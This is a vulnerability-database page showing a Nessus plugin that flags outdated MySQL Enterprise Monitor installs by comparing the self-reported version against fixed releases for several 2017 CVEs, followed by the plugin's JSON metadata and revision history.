Search...

MySQL Enterprise Monitor 3.2.x < 3.2.9.2249 / 3.3.x < 3.3.5.3292 / 3.4.x < 3.4.3.4225 Multiple Vulnerabilities (October 2017 CPU)

2017-09-28T00:00:00

ID MYSQL_ENTERPRISE_MONITOR_3_4_3_4225.NASL
Type nessus
Reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2020-02-02T00:00:00

Description

According to its self-reported version, the MySQL Enterprise Monitor application running on the remote host is 3.2.x prior to 3.2.9.2249, 3.3.x prior to 3.3.5.3292, or 3.4.x prior to 3.4.3.4225. It is, therefore, affected by multiple vulnerabilities as noted in the October 2017 Critical Patch Update advisory. Please consult the CVRF details for the applicable CVEs for additional information.

Note that Nessus has not tested for these issues but has instead relied only on the application

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(103536);
  script_version("1.11");
  script_cvs_date("Date: 2019/11/12");

  script_cve_id("CVE-2017-5664", "CVE-2017-9787", "CVE-2017-10424");
  script_bugtraq_id(98888, 99562, 101381);

  script_name(english:"MySQL Enterprise Monitor 3.2.x &lt; 3.2.9.2249 / 3.3.x &lt; 3.3.5.3292 / 3.4.x &lt; 3.4.3.4225 Multiple Vulnerabilities (October 2017 CPU)");
  script_summary(english:"Checks the version of MySQL Enterprise Monitor.");

  script_set_attribute(attribute:"synopsis", value:
"A web application running on the remote host is affected by a denial
of service vulnerability in apache struts 2.");
  script_set_attribute(attribute:"description", value:
"According to its self-reported version, the MySQL Enterprise Monitor
application running on the remote host is 3.2.x prior to 3.2.9.2249,
3.3.x prior to 3.3.5.3292, or 3.4.x prior to 3.4.3.4225.
It is, therefore, affected by multiple vulnerabilities as
noted in the October 2017 Critical Patch Update advisory. Please
consult the CVRF details for the applicable CVEs for additional
information.

Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number.");
  # https://www.oracle.com/technetwork/security-advisory/cve-2017-9805-products-3905487.html#AppendixMSQL
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?0d67d494");
  # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixMSQL
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6b8727c4");
  script_set_attribute(attribute:"solution", value:
"Upgrade to MySQL Enterprise Monitor version 3.2.9.2249 / 3.3.5.3292 / 
3.4.3.4225 or later as referenced in the Oracle security advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-10424");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/24");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/07/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/09/28");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:mysql_enterprise_monitor");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("mysql_enterprise_monitor_web_detect.nasl");
  script_require_keys("installed_sw/MySQL Enterprise Monitor", "Settings/ParanoidReport");
  script_require_ports("Services/www", 18443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

if (report_paranoia &lt; 2) audit(AUDIT_PARANOID);

app  = "MySQL Enterprise Monitor";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:18443);
install = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);
version = install['version'];
install_url = build_url(port:port, qs:"/");

fixes = { 
          "^3.4": "3.4.3.4225",
          "^3.3": "3.3.5.3292",
          "^3.2": "3.2.9.2249"
        };

vuln = FALSE;
fix = '';
foreach (prefix in keys(fixes))
{
  if (version =~ prefix && ver_compare(ver:version,
                                       fix:fixes[prefix],
                                       strict:FALSE) &lt; 0)
  {
    vuln = TRUE;
    fix = fixes[prefix];
    break;
  }
}

if (vuln)
{
  report =
    '\n  URL               : ' + install_url +
    '\n  Installed version : ' + version +
    '\n  Fixed version     : ' + fix +
    '\n';
  security_report_v4(port:port, severity:SECURITY_WARNING, extra:report);
}
else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);

JSON Vulners Source

Initial Source

{"id": "MYSQL_ENTERPRISE_MONITOR_3_4_3_4225.NASL", "bulletinFamily": "scanner", "title": "MySQL Enterprise Monitor 3.2.x < 3.2.9.2249 / 3.3.x < 3.3.5.3292 / 3.4.x < 3.4.3.4225 Multiple Vulnerabilities (October 2017 CPU)", "description": "According to its self-reported version, the MySQL Enterprise Monitor\napplication running on the remote host is 3.2.x prior to 3.2.9.2249,\n3.3.x prior to 3.3.5.3292, or 3.4.x prior to 3.4.3.4225.\nIt is, therefore, affected by multiple vulnerabilities as\nnoted in the October 2017 Critical Patch Update advisory. Please\nconsult the CVRF details for the applicable CVEs for additional\ninformation.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "published": "2017-09-28T00:00:00", "modified": "2020-02-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/103536", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?6b8727c4", "http://www.nessus.org/u?0d67d494"], "cvelist": ["CVE-2017-10424", "CVE-2017-9805", "CVE-2017-9787", "CVE-2017-5664"], "type": "nessus", "lastseen": "2020-02-01T00:49:08", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "cvelist": ["CVE-2017-10424", "CVE-2017-9805", "CVE-2017-9787", "CVE-2017-5664"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "description": "According to its self-reported version, the MySQL Enterprise Monitor\napplication running on the remote host is 3.2.x prior to 3.2.9.2249,\n3.3.x prior to 3.3.5.3292, or 3.4.x prior to 3.4.3.4225.\nIt is, therefore, affected by multiple vulnerabilities as\nnoted in the October 2017 Critical Patch Update advisory. Please\nconsult the CVRF details for the applicable CVEs for additional\ninformation.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "edition": 21, "enchantments": {"dependencies": {"modified": "2020-01-01T00:22:19", "references": [{"idList": ["THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A"], "type": "threatpost"}, {"idList": ["F5:K86300800", "F5:K84144321", "F5:K51433470", "F5:K01225001"], "type": "f5"}, {"idList": ["TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913"], "type": "trendmicroblog"}, {"idList": ["CFOUNDRY:3B3A927B1B8E5A80A8EA38A6AACF98EE"], "type": "cloudfoundry"}, {"idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS2_REST_XSTREAM"], "type": "metasploit"}, {"idList": ["SUSE-SU-2017:3279-1", "SUSE-SU-2017:3039-1", "OPENSUSE-SU-2017:3069-1"], "type": "suse"}, {"idList": ["TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"], "type": "talosblog"}, {"idList": ["MYHACK58:62201786929", "MYHACK58:62201789104", "MYHACK58:62201788199"], "type": "myhack58"}, {"idList": ["THN:460709FF530ED7F35B5817A55F1BF2C6", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:6C0E5E35ABB362C8EA341381B3DD76D6"], "type": "thn"}, {"idList": ["IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:81785CACF2722C5387530DCFDE54E6E4", "IMPERVABLOG:38007E943B20A50B729BC17911999C11", "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD"], "type": "impervablog"}, {"idList": ["PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7"], "type": "pentestit"}, {"idList": ["ELSA-2017-1809"], "type": "oraclelinux"}, {"idList": ["ALAS-2017-862", "ALAS-2017-873", "ALAS-2017-853", "ALAS-2017-854"], "type": "amazon"}, {"idList": ["SSV:96562", "SSV:96420"], "type": "seebug"}, {"idList": ["RHSA-2017:2636", "RHSA-2017:2635", "RHSA-2017:2637", "RHSA-2017:1809"], "type": "redhat"}, {"idList": ["CESA-2017:1809"], "type": "centos"}, {"idList": ["VU:112992"], "type": "cert"}, {"idList": ["EDB-ID:42627"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-28454", "1337DAY-ID-28445"], "type": "zdt"}, {"idList": ["DEBIAN:DLA-996-1:D223D", "DEBIAN:DSA-3891-1:F49C7", "DEBIAN:DSA-3892-1:576B2"], "type": "debian"}, {"idList": ["CISCO-SA-20170907-STRUTS2"], "type": "cisco"}, {"idList": ["FEDORA_2017-794C18B62D.NASL", "STRUTS_2_3_33.NASL", "FEDORA_2017-E4638A345C.NASL", "FEDORA_2017-63789C8C29.NASL", "STRUTS_2_5_13_REST_RCE.NASL", "DEBIAN_DLA-996.NASL", "DEBIAN_DSA-3892.NASL", "ALA_ALAS-2017-854.NASL", "ALA_ALAS-2017-853.NASL", "DEBIAN_DSA-3891.NASL"], "type": "nessus"}, {"idList": ["GHSA-GG9M-FJ3V-R58C", "GHSA-8MR5-H28G-36QX"], "type": "github"}, {"idList": ["SAINT:1AF820E0642E7888070E0C7DD723BBAE", "SAINT:49062325B1FAB54D731E4C8FBF78D940"], "type": "saint"}, {"idList": ["E-643"], "type": "dsquare"}, {"idList": ["CVE-2017-10424", "CVE-2017-9805", "CVE-2017-9787", "CVE-2017-5664"], "type": "cve"}, {"idList": ["PACKETSTORM:144050", "PACKETSTORM:144034"], "type": "packetstorm"}, {"idList": ["OPENVAS:703892", "OPENVAS:1361412562310703892", "OPENVAS:1361412562310106956", "OPENVAS:703891", "OPENVAS:1361412562310811140", "OPENVAS:1361412562310811305", "OPENVAS:1361412562310890996", "OPENVAS:1361412562310811730", "OPENVAS:1361412562310106957", "OPENVAS:1361412562310703891"], "type": "openvas"}]}, "score": {"modified": "2020-01-01T00:22:19", "value": 7.2, "vector": "NONE"}}, "hash": "b2fa0126d26634ae30f5006474b3faa9224b1ffe0355059918ad0aea7a97af72", "hashmap": [{"hash": "1b80047fc25e133e710f5dd7f80138f4", "key": "published"}, {"hash": "bd5aeea5a01a71324a958bdbc8e2eb65", "key": "references"}, {"hash": "e2fc8dd594cf5168a42506e1aadc6c33", "key": "pluginID"}, {"hash": "242645d9d5e13438e87b93ab155d704d", "key": "reporter"}, {"hash": "2249940a684898a70237266de5d6dd6c", "key": "modified"}, {"hash": "f795c3e55223861af7c942933819173e", "key": "cvelist"}, {"hash": "d9224edeadb06d401803758615df1354", "key": "sourceData"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "ca47b68c1cdb8725513d34a942f523da", "key": "cpe"}, {"hash": "62cb1ea79c688141f1b71e9bb4ad1bf0", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "01a22de365e4ed34b8cb47089acda2dc", "key": "description"}, {"hash": "d6d98acecf4b44e3e7cce8dcc7153864", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/103536", "id": "MYSQL_ENTERPRISE_MONITOR_3_4_3_4225.NASL", "lastseen": "2020-01-01T00:22:19", "modified": "2020-01-02T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "103536", "published": "2017-09-28T00:00:00", "references": ["http://www.nessus.org/u?6b8727c4", "http://www.nessus.org/u?0d67d494"], "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103536);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2017-5664\", \"CVE-2017-9787\", \"CVE-2017-10424\");\n script_bugtraq_id(98888, 99562, 101381);\n\n script_name(english:\"MySQL Enterprise Monitor 3.2.x < 3.2.9.2249 / 3.3.x < 3.3.5.3292 / 3.4.x < 3.4.3.4225 Multiple Vulnerabilities (October 2017 CPU)\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a denial\nof service vulnerability in apache struts 2.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\napplication running on the remote host is 3.2.x prior to 3.2.9.2249,\n3.3.x prior to 3.3.5.3292, or 3.4.x prior to 3.4.3.4225.\nIt is, therefore, affected by multiple vulnerabilities as\nnoted in the October 2017 Critical Patch Update advisory. Please\nconsult the CVRF details for the applicable CVEs for additional\ninformation.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.oracle.com/technetwork/security-advisory/cve-2017-9805-products-3905487.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0d67d494\");\n # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b8727c4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor version 3.2.9.2249 / 3.3.5.3292 / \n3.4.3.4225 or later as referenced in the Oracle security advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10424\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/28\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:18443);\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nfixes = { \n \"^3.4\": \"3.4.3.4225\",\n \"^3.3\": \"3.3.5.3292\",\n \"^3.2\": \"3.2.9.2249\"\n };\n\nvuln = FALSE;\nfix = '';\nforeach (prefix in keys(fixes))\n{\n if (version =~ prefix && ver_compare(ver:version,\n fix:fixes[prefix],\n strict:FALSE) < 0)\n {\n vuln = TRUE;\n fix = fixes[prefix];\n break;\n }\n}\n\nif (vuln)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "title": "MySQL Enterprise Monitor 3.2.x < 3.2.9.2249 / 3.3.x < 3.3.5.3292 / 3.4.x < 3.4.3.4225 Multiple Vulnerabilities (October 2017 CPU)", "type": "nessus", "viewCount": 9}, "differentElements": ["modified"], "edition": 21, "lastseen": "2020-01-01T00:22:19"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "cvelist": ["CVE-2017-10424", "CVE-2017-9805", "CVE-2017-9787", "CVE-2017-5664"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "description": "According to its self-reported version, the MySQL Enterprise Monitor\napplication running on the remote host is 3.2.x prior to 3.2.9.2249,\n3.3.x prior to 3.3.5.3292, or 3.4.x prior to 3.4.3.4225.\nIt is, therefore, affected by multiple vulnerabilities as\nnoted in the October 2017 Critical Patch Update advisory. Please\nconsult the CVRF details for the applicable CVEs for additional\ninformation.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "edition": 17, "enchantments": {"dependencies": {"modified": "2019-10-28T20:44:19", "references": [{"idList": ["TOMCAT_8_5_15.NASL", "FEDORA_2017-794C18B62D.NASL", "STRUTS_2_3_33.NASL", "FEDORA_2017-E4638A345C.NASL", "FEDORA_2017-63789C8C29.NASL", "STRUTS_2_5_13_REST_RCE.NASL", "DEBIAN_DSA-3892.NASL", "ALA_ALAS-2017-854.NASL", "ALA_ALAS-2017-853.NASL", "DEBIAN_DSA-3891.NASL"], "type": "nessus"}, {"idList": ["THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A"], "type": "threatpost"}, {"idList": ["F5:K86300800", "F5:K84144321", "F5:K51433470", "F5:K01225001"], "type": "f5"}, {"idList": ["TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913"], "type": "trendmicroblog"}, {"idList": ["CFOUNDRY:3B3A927B1B8E5A80A8EA38A6AACF98EE"], "type": "cloudfoundry"}, {"idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS2_REST_XSTREAM"], "type": "metasploit"}, {"idList": ["SUSE-SU-2017:3279-1", "SUSE-SU-2017:3039-1", "OPENSUSE-SU-2017:3069-1"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310703892", "OPENVAS:1361412562310106956", "OPENVAS:703891", "OPENVAS:1361412562310811140", "OPENVAS:1361412562310811305", "OPENVAS:1361412562310890996", "OPENVAS:1361412562310811730", "OPENVAS:1361412562310811141", "OPENVAS:1361412562310106957", "OPENVAS:1361412562310703891"], "type": "openvas"}, {"idList": ["TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"], "type": "talosblog"}, {"idList": ["MYHACK58:62201786929", "MYHACK58:62201789104", "MYHACK58:62201788199"], "type": "myhack58"}, {"idList": ["THN:460709FF530ED7F35B5817A55F1BF2C6", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:6C0E5E35ABB362C8EA341381B3DD76D6"], "type": "thn"}, {"idList": ["IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:81785CACF2722C5387530DCFDE54E6E4", "IMPERVABLOG:38007E943B20A50B729BC17911999C11", "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD"], "type": "impervablog"}, {"idList": ["PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7"], "type": "pentestit"}, {"idList": ["ELSA-2017-1809"], "type": "oraclelinux"}, {"idList": ["ALAS-2017-862", "ALAS-2017-873", "ALAS-2017-853", "ALAS-2017-854"], "type": "amazon"}, {"idList": ["SSV:96562", "SSV:96420"], "type": "seebug"}, {"idList": ["CESA-2017:1809"], "type": "centos"}, {"idList": ["VU:112992"], "type": "cert"}, {"idList": ["EDB-ID:42627"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-28454", "1337DAY-ID-28445"], "type": "zdt"}, {"idList": ["DEBIAN:DLA-996-1:D223D", "DEBIAN:DSA-3891-1:F49C7", "DEBIAN:DSA-3892-1:576B2"], "type": "debian"}, {"idList": ["CISCO-SA-20170907-STRUTS2"], "type": "cisco"}, {"idList": ["RHSA-2017:2636", "RHSA-2017:2635", "RHSA-2017:2637", "RHSA-2017:1809", "RHSA-2017:2638", "RHSA-2017:2633"], "type": "redhat"}, {"idList": ["SAINT:1AF820E0642E7888070E0C7DD723BBAE", "SAINT:49062325B1FAB54D731E4C8FBF78D940"], "type": "saint"}, {"idList": ["E-643"], "type": "dsquare"}, {"idList": ["CVE-2017-10424", "CVE-2017-9805", "CVE-2017-9787", "CVE-2017-5664"], "type": "cve"}, {"idList": ["PACKETSTORM:144050", "PACKETSTORM:144034"], "type": "packetstorm"}]}, "score": {"modified": "2019-10-28T20:44:19", "value": 7.5, "vector": "NONE"}}, "hash": "8e0d0e92f8751d6097aed071b2e6fdaaaf7c50c9614ea2e5988d6308597e1ac8", "hashmap": [{"hash": "1b80047fc25e133e710f5dd7f80138f4", "key": "published"}, {"hash": "bd5aeea5a01a71324a958bdbc8e2eb65", "key": "references"}, {"hash": "e2fc8dd594cf5168a42506e1aadc6c33", "key": "pluginID"}, {"hash": "f795c3e55223861af7c942933819173e", "key": "cvelist"}, {"hash": "0f0d39556677e639cd9b41d1abbcad58", "key": "reporter"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "ca47b68c1cdb8725513d34a942f523da", "key": "cpe"}, {"hash": "62cb1ea79c688141f1b71e9bb4ad1bf0", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "01a22de365e4ed34b8cb47089acda2dc", "key": "description"}, {"hash": "4a740e552349af6dd4743ab8796290a1", "key": "sourceData"}, {"hash": "d6d98acecf4b44e3e7cce8dcc7153864", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/103536", "id": "MYSQL_ENTERPRISE_MONITOR_3_4_3_4225.NASL", "lastseen": "2019-10-28T20:44:19", "modified": "2019-10-02T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "103536", "published": "2017-09-28T00:00:00", "references": ["http://www.nessus.org/u?6b8727c4", "http://www.nessus.org/u?0d67d494"], "reporter": "This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103536);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\n \"CVE-2017-5664\",\n \"CVE-2017-9787\",\n \"CVE-2017-10424\"\n );\n script_bugtraq_id(\n 98888,\n 99562,\n 101381\n );\n\n script_name(english:\"MySQL Enterprise Monitor 3.2.x < 3.2.9.2249 / 3.3.x < 3.3.5.3292 / 3.4.x < 3.4.3.4225 Multiple Vulnerabilities (October 2017 CPU)\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a denial\nof service vulnerability in apache struts 2.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\napplication running on the remote host is 3.2.x prior to 3.2.9.2249,\n3.3.x prior to 3.3.5.3292, or 3.4.x prior to 3.4.3.4225.\nIt is, therefore, affected by multiple vulnerabilities as\nnoted in the October 2017 Critical Patch Update advisory. Please\nconsult the CVRF details for the applicable CVEs for additional\ninformation.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.oracle.com/technetwork/security-advisory/cve-2017-9805-products-3905487.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0d67d494\");\n # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b8727c4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor version 3.2.9.2249 / 3.3.5.3292 / \n3.4.3.4225 or later as referenced in the Oracle security advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:18443);\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nfixes = { \n \"^3.4\": \"3.4.3.4225\",\n \"^3.3\": \"3.3.5.3292\",\n \"^3.2\": \"3.2.9.2249\"\n };\n\nvuln = FALSE;\nfix = '';\nforeach (prefix in keys(fixes))\n{\n if (version =~ prefix && ver_compare(ver:version,\n fix:fixes[prefix],\n strict:FALSE) < 0)\n {\n vuln = TRUE;\n fix = fixes[prefix];\n break;\n }\n}\n\nif (vuln)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "title": "MySQL Enterprise Monitor 3.2.x < 3.2.9.2249 / 3.3.x < 3.3.5.3292 / 3.4.x < 3.4.3.4225 Multiple Vulnerabilities (October 2017 CPU)", "type": "nessus", "viewCount": 4}, "differentElements": ["modified"], "edition": 17, "lastseen": "2019-10-28T20:44:19"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2017-10424", "CVE-2017-9787", "CVE-2017-5664"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "According to its self-reported version, the MySQL Enterprise Monitor application running on the remote host is 3.2.x prior to 3.2.9.2249, 3.3.x prior to 3.3.5.3292, or 3.4.x prior to 3.4.3.4225.\nIt is, therefore, affected by multiple vulnerabilities as noted in the October 2017 Critical Patch Update advisory. Please consult the CVRF details for the applicable CVEs for additional information.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 4, "enchantments": {}, "hash": "201f5d89f65942ce1e34e78203b78608e7bb5d9a783deb8df8c712873ffeb78b", "hashmap": [{"hash": "1b80047fc25e133e710f5dd7f80138f4", "key": "published"}, {"hash": "3580dadbeebc05c7250daf4499071182", "key": "references"}, {"hash": "e11ceae9cbda27e0a9b7e80058362e68", "key": "description"}, {"hash": "e2fc8dd594cf5168a42506e1aadc6c33", "key": "pluginID"}, {"hash": 